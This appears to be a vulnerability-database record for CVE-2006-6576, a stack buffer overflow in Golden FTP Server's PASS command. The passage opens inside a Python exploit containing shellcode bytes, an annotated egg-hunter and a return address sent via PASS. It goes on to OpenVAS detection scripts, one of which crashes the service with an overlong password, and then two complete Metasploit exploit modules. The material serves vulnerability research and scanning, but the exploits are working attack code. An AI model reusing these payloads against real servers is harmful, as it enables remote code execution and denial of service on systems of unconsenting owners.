b\"\\x01\\x3b\\x26\\x69\\x85\\x67\\xfc\\x10\\x9c\\xcd\\x53\\x2c\\xfe\"\r\nbuf += b\"\\xad\\x0c\\x88\\x75\\x43\\x58\\xa1\\xd4\\x0c\\xad\\x88\\xe6\\xcc\"\r\nbuf += b\"\\xb9\\x9b\\x95\\xfe\\x66\\x30\\x31\\xb3\\xef\\x9e\\xc6\\xb4\\xc5\"\r\nbuf += b\"\\x67\\x58\\x4b\\xe6\\x97\\x71\\x88\\xb2\\xc7\\xe9\\x39\\xbb\\x83\"\r\nbuf += b\"\\xe9\\xc6\\x6e\\x03\\xb9\\x68\\xc1\\xe4\\x69\\xc9\\xb1\\x8c\\x63\"\r\nbuf += 
b\"\\xc6\\xee\\xad\\x8c\\x0c\\x87\\x44\\x77\\xc7\\x68\\x30\\x76\\x16\"\r\nbuf += b\"\\x01\\x43\\x78\\x09\\x8d\\xca\\x9e\\x43\\x3d\\x9b\\x09\\xfc\\xa4\"\r\nbuf += b\"\\x86\\xc1\\x9d\\x29\\x1d\\xac\\x9e\\xa2\\x92\\x51\\x50\\x43\\xde\"\r\nbuf += b\"\\x41\\x05\\xa3\\x95\\x3b\\x80\\xbc\\x03\\x53\\x4e\\x2e\\xc8\\xa3\"\r\nbuf += b\"\\x19\\x53\\x47\\xf4\\x4e\\xa5\\x9e\\x90\\x62\\x9c\\x08\\x86\\x7e\"\r\nbuf += b\"\\x78\\x72\\x02\\xa5\\xb9\\x7d\\x8b\\x28\\x85\\x59\\x9b\\xf4\\x06\"\r\nbuf += b\"\\xe6\\xcf\\xa8\\x50\\xb0\\xb9\\x0e\\x0b\\x72\\x13\\xd9\\xe0\\xdc\"\r\nbuf += b\"\\xf3\\x9c\\xca\\xde\\x85\\xa0\\x06\\xa9\\x69\\x10\\xff\\xec\\x96\"\r\nbuf += b\"\\x9d\\x97\\xf8\\xef\\xc3\\x07\\x06\\x3a\\x40\\x37\\x4d\\x66\\xe1\"\r\nbuf += b\"\\xd0\\x08\\xf3\\xb3\\xbc\\xaa\\x2e\\xf7\\xb8\\x28\\xda\\x88\\x3e\"\r\nbuf += b\"\\x30\\xaf\\x8d\\x7b\\xf6\\x5c\\xfc\\x14\\x93\\x62\\x53\\x14\\xb6\"\r\n\r\ntotal_length = 545-len(SOURCE)\r\neip = b'\\x7f\\x79\\x4c\\x00'\r\nhunter = b'\\x90\\x90\\x90\\x90\\x90\\x90' # padding ; nop slide to account for variable offset base on source ip\r\nhunter += b'\\xfd' # std ; set df flag so we search high to low\r\nhunter += b'\\xb8\\x43\\x42\\x41\\x40' # mov eax, 0x40414243 ; egg\r\nhunter += b'\\x89\\xF7' # mov edi, esi ; start searching from esi\r\nhunter += b'\\x47' # inc edi\r\nhunter += b'\\x90' # nop\r\nhunter += b'\\x83\\xC7\\x03' # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1\r\nhunter += b'\\xaf' # scasd ; check for egg at edi\r\nhunter += b'\\x75\\xfa' # short jnz -0x6 ; jump back to add edi, 0x3\r\nhunter += b'\\x83\\xC7\\x03' # add edi, 0x3\r\nhunter += b'\\xaf' # scasd\r\nhunter += b'\\x75\\xfa' # short jnz -0x6\r\nhunter += b'\\x83\\xC7\\x1f' # add edi, 0x1f ; account for egg hunter\r\nhunter += b'\\xff\\xe7' # jmp edi ; egg found, let's go!\r\nhunter += b'\\x90\\x90\\x90\\x90\\x90\\x90' # padding ; nop slide to account for variable offset again\r\n\r\npayload = hunter + buf + 
b'\\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip\r\n\r\ns.send(b'USER anonymous\\r\\n')\r\nprint(s.recv(1024))\r\nprint(s.recv(1024))\r\ns.send(b'PASS ' + payload + b'\\r\\n')\r\nprint(s.recv(1024))\r\ns.send(b'QUIT\\r\\n')\r\nprint(s.recv(1024))", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/49629"}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2006-6576"], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:23323](https://secuniaresearch.flexerasoftware.com/advisories/23323/)\nOther Advisory URL: http://retrogod.altervista.org/golden_heap.html\nFrSIRT Advisory: ADV-2006-4936\n[CVE-2006-6576](https://vulners.com/cve/CVE-2006-6576)\n", "edition": 1, "modified": "2006-12-03T22:57:18", "published": "2006-12-03T22:57:18", "href": "https://vulners.com/osvdb/OSVDB:35951", "id": "OSVDB:35951", "title": "Golden FTP Server PASS Command Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-03-26T19:11:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6576"], "description": "The host is running Golden FTP Server and is prone to buffer\n overflow vulnerability.", "modified": "2020-03-24T00:00:00", "published": "2011-06-13T00:00:00", "id": "OPENVAS:1361412562310802024", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802024", "type": "openvas", "title": "Golden FTP PASS Command Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Golden FTP PASS Command Buffer Overflow Vulnerability\n#\n# Authors:\n# Veerendra G.G <veernedragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can 
redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802024\");\n script_version(\"2020-03-24T12:27:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 12:27:11 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-13 15:28:04 +0200 (Mon, 13 Jun 2011)\");\n script_cve_id(\"CVE-2006-6576\");\n script_bugtraq_id(45957, 45924);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Golden FTP PASS Command Buffer Overflow Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"FTP\");\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"ftp/golden_tfp/detected\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/23323\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/17355\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/16036\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code on the system or cause the application to 
crash.\");\n\n script_tag(name:\"affected\", value:\"Golden FTP Server Version 4.70, other versions may also be\n affected.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to format string error while parsing 'PASS'\n command, which can be exploited to crash the FTP service by sending 'PASS'\n command with an overly long username parameter.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"The host is running Golden FTP Server and is prone to buffer\n overflow vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"misc_func.inc\");\n\nftpPort = ftp_get_port(default:21);\nbanner = ftp_get_banner(port:ftpPort);\nif(!banner || \"Golden FTP Server\" >!< banner){\n exit(0);\n}\n\nsoc = open_sock_tcp(ftpPort);\nif(!soc) {\n exit(0);\n}\n\nresp = ftp_recv_line(socket:soc);\nif(!resp || \"220 Golden FTP Server\" >!< resp){\n ftp_close(socket:soc);\n exit(0);\n}\n\nuser_cmd = string(\"USER Anonymous\", \"\\r\\n\");\nsend(socket:soc, data:user_cmd);\nresp = recv_line(socket:soc, length:260);\n\npass_cmd = string(\"PASS \" , crap(data:'A', length:500) , \"\\r\\n\");\nsend(socket:soc, data:pass_cmd);\nresp = recv_line(socket:soc, length:260);\n\nftp_close(socket:soc);\n\nsleep(1);\n\nsoc1 = open_sock_tcp(ftpPort);\nif(!soc1) {\n security_message(port:ftpPort);\n exit(0);\n}\n\nresp = ftp_recv_line(socket:soc);\nif(!resp || \"220 Golden FTP Server\" >!< resp){\n security_message(port:ftpPort);\n}\n\nftp_close(socket:soc1);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2020-03-26T19:11:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6576"], "description": "Golden FTP Server is prone to a denial-of-service vulnerability.", "modified": "2020-03-24T00:00:00", "published": "2011-01-20T00:00:00", "id": "OPENVAS:1361412562310103037", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103037", "type": "openvas", "title": "Golden FTP Server Malformed Message Denial Of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Golden FTP Server Malformed Message Denial Of Service Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103037\");\n script_version(\"2020-03-24T12:27:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 12:27:11 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-01-20 13:02:23 +0100 (Thu, 20 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2006-6576\");\n script_bugtraq_id(45924);\n script_name(\"Golden FTP Server Malformed Message Denial Of Service Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_family(\"FTP\");\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"ftp/golden_tfp/detected\");\n\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/bid/45924\");\n script_xref(name:\"URL\", value:\"http://www.mediafire.com/?jej19gc93zjbiyu\");\n\n script_tag(name:\"summary\", value:\"Golden FTP Server is prone to a denial-of-service vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Exploits will cause the application to crash, denying service to\n legitimate users.\");\n\n script_tag(name:\"affected\", value:\"Golden FTP Server 4.70 is vulnerable. Other versions may also\n be affected.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. 
General solution options are to upgrade to a newer release,\n disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"version_func.inc\");\n\nport = ftp_get_port( default:21 );\nbanner = ftp_get_banner( port:port );\nif( ! banner || \"Golden FTP\" >!< banner )\n exit( 0 );\n\nversion = eregmatch( pattern:\"Golden FTP Server ready v([0-9.]+)\", string:banner );\n\nif( ! isnull( version[1] ) ) {\n if( version_is_less_equal( version:version[1], test_version:\"4.70\" ) ) {\n security_message( port:port );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:43", "description": "", "published": "2011-06-03T00:00:00", "type": "packetstorm", "title": "GoldenFTP PASS Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6576"], "modified": "2011-06-03T00:00:00", "id": "PACKETSTORM:101952", "href": "https://packetstormsecurity.com/files/101952/GoldenFTP-PASS-Stack-Buffer-Overflow.html", "sourceData": "`# \n# $Id: goldenftp_pass_bof.rb 12816 2011-06-02 12:24:25Z swtornio $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = AverageRanking \n \ninclude Msf::Exploit::Remote::Ftp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'GoldenFTP PASS Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a vulnerability in the Golden \nFTP service. 
This module uses the PASS command to trigger the overflow. \n}, \n'Author' => [ 'bannedit' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12816 $', \n'References' => \n[ \n[ 'CVE', '2006-6576'], \n[ 'OSVDB', '35951'], \n[ 'BID', '45957 '], \n[ 'URL', 'http://www.exploit-db.com/exploits/16036/'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 350, \n'BadChars' => \"\\x00\\x0a\\x0d\", \n}, \n'Platform' => ['win'], \n'Targets' => \n[ \n[ \n'Golden FTP 4.70 Universal', # Tested OK - bannedit 05/31/2011 \n{ \n'Platform' => 'win', \n'Ret' => 0x00a93ca6, \n}, \n] \n \n], \n'DisclosureDate' => 'Jan 23 2011')) \nend \n \ndef check \nconnect \ndisconnect \nprint_status(\"FTP Banner: #{banner}\".strip) \nif banner =~ /Golden FTP Server ready v(4\\.\\d{2})/ and $1 == \"4.70\" \nreturn Exploit::CheckCode::Appears \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nif datastore['RHOST'].length < 15 \npad = make_nops(1) * (15 - datastore['RHOST'].length) \nend \n \nsploit = make_nops(4) * 38 \nsploit << payload.encoded \nsploit << pad \nsploit << make_nops(1) * (528 - sploit.length) \nsploit << [target.ret].pack('V') \n \nprint_status(\"Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}\") \nbegin \nconnect \nsend_user(\"anonymous\") \nsend_cmd(['PASS', sploit], false) \nhandler \nrescue EOFError \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/101952/goldenftp_pass_bof.rb.txt"}], "metasploit": [{"lastseen": "2020-08-21T23:58:58", "description": "This module exploits a vulnerability in the Golden FTP service, using the PASS command to cause a buffer overflow. Please note that in order trigger the vulnerable code, the victim machine must have the \"Show new connections\" setting enabled. 
By default, this option is unchecked.\n", "published": "2011-06-02T01:10:22", "type": "metasploit", "title": "GoldenFTP PASS Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6576"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/FTP/GOLDENFTP_PASS_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Ftp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'GoldenFTP PASS Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the Golden FTP service, using the PASS\n command to cause a buffer overflow. Please note that in order trigger the vulnerable\n code, the victim machine must have the \"Show new connections\" setting enabled. By\n default, this option is unchecked.\n },\n 'Author' =>\n [\n 'Craig Freyman', #Initial poc on exploit-db with iglesiasgg\n 'bannedit', #Initial msf module\n 'Joff Thyer <jsthyer[at]gmail.com>', #Improved msf version\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2006-6576'],\n [ 'OSVDB', '35951'],\n [ 'BID', '45957'],\n [ 'EDB', '16036'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 440,\n 'BadChars' => \"\\x00\\x0a\\x0d\",\n },\n 'Platform' => ['win'],\n 'Targets' =>\n [\n [ 'Windows XP Pro SP3', { 'Ret' => 0x7E45AE4E, } ], #JMP ESI USER32.dll\n [ 'Windows XP Pro SP2', { 'Ret' => 0x77D4E23B, } ], #JMP ESI USER32.dll\n [ 'Windows XP Pro SP0/SP1', { 'Ret' => 0x77e8157b, } ] #JMP ESI kernel32.dll\n ],\n 'DisclosureDate' => 'Jan 23 2011'))\n end\n\n def check\n connect\n disconnect\n vprint_status(\"FTP Banner: #{banner}\".strip)\n if banner =~ /Golden FTP Server ready v(4\\.\\d{2})/ and $1 == \"4.70\"\n return 
Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n shortjmp = make_nops(3) + \"\\xeb\\x20\"\n nopsled = make_nops(1) * 60\n srciplen = Rex::Socket.source_address.length\n padding = make_nops(1) * (533 - (srciplen + nopsled.length + payload.encoded.length))\n\n sploit = nopsled\n sploit << payload.encoded\n sploit << padding\n sploit << [target.ret].pack('V')\n\n print_status(\"Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}\")\n\n connect\n raw_send(shortjmp + \"\\n\")\n send_user(datastore['FTPUSER'])\n send_cmd(['PASS', sploit], false)\n select(nil,nil,nil,2)\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/goldenftp_pass_bof.rb"}]}